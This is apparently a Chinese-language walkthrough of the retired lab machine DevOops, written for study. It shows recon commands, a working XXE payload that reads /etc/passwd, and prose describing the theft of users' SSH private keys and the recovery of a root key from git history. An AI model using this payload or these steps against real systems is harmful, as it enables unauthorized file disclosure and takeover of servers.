本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关
靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.91
本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描
执行命令 autorecon 10.10.10.91 -o ./DevOops-autorecon
看到开放了5000的web应用端口,访问看看
没发现啥东西,跑跑目录看看
gobuster dir -u http://10.10.10.91:5000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -t 400 -x php,jsp,txt -o bmfx-devoops-gobuster
爆破出来一个目录upload访问下
看上面显示带XML的,猜测可能存在XXE攻击,通过构造下面的XXE攻击代码
<?xml version="1.0"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]> <feed> <Author>Gerh</Author> <Subject>BinaryChaos</Subject> <Content>&xxe;</Content> </feed>
上传之后通过burpsuite进行重放请求
看到了 3个普通用户,分别是osboxes,roosa,blogfeed 都尝试读取这些用户的id_rsa,经过测试最终得到如下
使用此密钥给其400权限然后远程ssh登录
通过遍历当前目录下的各个文件,发现发现一处密钥信息
使用此密钥登录root用户,发现不能正常登录,猜测可能不是root的私钥,使用git stash保存下当前工作进度,具体如下操作:
到了上述实际是可以直接复制上述得到的密钥去掉前面每行的所有”+“即可,但是我这还是想把写入到文件中,自动剔除+号
最终成功使用ssh登录root用户
